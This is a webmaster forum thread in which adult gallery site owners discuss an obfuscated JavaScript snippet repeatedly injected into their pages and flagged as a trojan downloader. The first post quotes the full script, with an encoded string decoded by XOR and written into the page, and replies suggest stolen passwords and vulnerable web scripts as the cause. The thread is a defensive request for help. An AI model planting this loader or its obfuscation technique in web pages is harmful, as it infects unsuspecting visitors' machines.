javascript trojan on my tgp
 

the following javascript code keeps on reappearing on my tgp site. has everyone delt with this trojan before? i can temporary remove it by deleting my index.shtml file and rebuilding it but it keeps coming back. here's the javascript code:

<script language="JavaScript">
e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA% C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA %C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8 C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE% 8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6 %CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%9 9%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<st r1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>

my system was infected with a trojan but its been cleaned and removed. please advise.

you are not alone. There are a whole bunch of sites out there getting hit.

Check the scripts you are using on that site. Most likely that is how they got in. Check cron files and so on. And of course contact your host, they might have the poop on this stuff.

What tgp and trading scripts are you using?

Are you running phpbb by chance on the server?

auto gallery pro & arrow trader lite 3.

no clues in the crontab & host says its due from an unsecure script. :disgust

What host and were they more specific? If its a managed box from any of the larger hosts I would expect a better response/support than that, considering how prevelant that exploit seems to be.

i'm with webair and using their starter plan.

whats it do, prompt to download an exe?

once you load the page, anti-virus program picks it up as a trojan.

i just changed my admin password in case and deleted my infected index.shtml file and rebuilt the page. it's clean now but the javascript code usually reappears within a few hours. hopefully not this time. <crosses fingers>

yea but i wonder what kind of trojan it could possibly be...whats it doing to the surfers

That actually was a surprising and unexpected reply. I use webair but have a dedicated server. I don?t know if there are different tiers of support based on the plans however webair has always provided impeccable support and assistance whenever I have had problems - often spending hours on the phone or via live chat to assist.

I haven?t encountered your specific dilemma however so I can?t vouch for what their terms of service are in each particular instance of support requests.

Perhaps try hitting them up again?

I wish I could assist however I?m all thumbs when it comes to scripts and security, hence my dependence on a good host that will provide that for me.

i believe its called, trojan-downloader.html.agent.aq

I would place good money on it not playing nice. Sucks for his bookmarkers as they would have no idea that it wasn't his fault.

Perhaps once you get your site clean you should provide links to some free removal software such as adaware, avgfree, MS anti spyware, etc. on your site and explain why they should use them.

i don't have any complaints with webair or their support. i contacted them via email and was told, "It can usually be attributed to an unsecure script", so i'm contacting the script creators and going to see what they say about this.

providing my bookmarkers with free software is a great idea. i'll get some links up later today.

dude contact webair and tell them to tell you what the problem is for sure , you shouldnt be left guessing.. or find a new host..

Im with webair , and they have always answered my questions promtly , sometimes people give bland answers ask for facts..

alot of people asking me about this trojan lately.. prob the "spysheriff" verio.s and its prob set to a cronjob or something on a schedult to reinfect you so it wont just "go away " on its own or by deleting anything

do you have any blog software ? wordpress seems to be a common target .. cpanel also has some problems lately.. so make sure your up to date..

Bump for STB. He certainly knows his shit and his advice is dead on. Btw if that is the spysheriff virus also instruct your surfers to chargeback if they do fall for the spysheriff pitch. Its basically rasomware that takes over the computer and charges users for their software to "remove" what they have been responsible for installing. Nasty shit. I also found these other posts with the identical problem. Hope they are helpfull.

http://www.gofuckyourself.com/showthread.php?t=611063
http://www.gofuckyourself.com/showthread.php?t=561290
http://www.gofuckyourself.com/showthread.php?t=559591

If you have access to raw logs check to see if it was just placed on the page and uploaded - this has been the most common way pages had this installed - most likely due to someone with access to a password file as there is never any intrusion attempts and the page is just ftp'd - most people that were hit were using a common password on their server and either a processing program or sponsor (we havent found the common one yet to figure out who's password list was compromised)

The second way is one of these programs with security holes:
Vbulletin
PHPBB
Autolinks
Invision Power Board
phpmyadmin
phpadsnew
wordpress
awstats 6.5
sitedepth
I-RATER
phpBazar

Most of these have recently released updates for their security holes

i don't have access to raw log files but i changed my admin password before i went to bed and my page is still clean.

Have you checked the templates in your scripts?

Here are a few more url's with the same script, in case anyone knows the owners.

wanktool.com
teensinboots.com/index.shtml
technorgasmic.com
nastylatex.com/index.shtml
pornlinks-united.com

As far as i know its the guy that does it is using an exploit in autogallery to stick the trojan on your site.

one of my toplist templates had the javascript code & i removed it. it came back again but in a different section of the shtml file. it keeps coming back after i clean it but in different locations of the shtml file. the javascript code is always found at the bottom portion of the shtml file. it hasn't reappeared ever since i changed my admin password lastnight before i went to bed.

I got it a week or so ago and so far it only appeared just that once. The only scripts I am using on that site are phpadsnew and Links 2.0

Yup had it as well. just deleted the code and changed my server password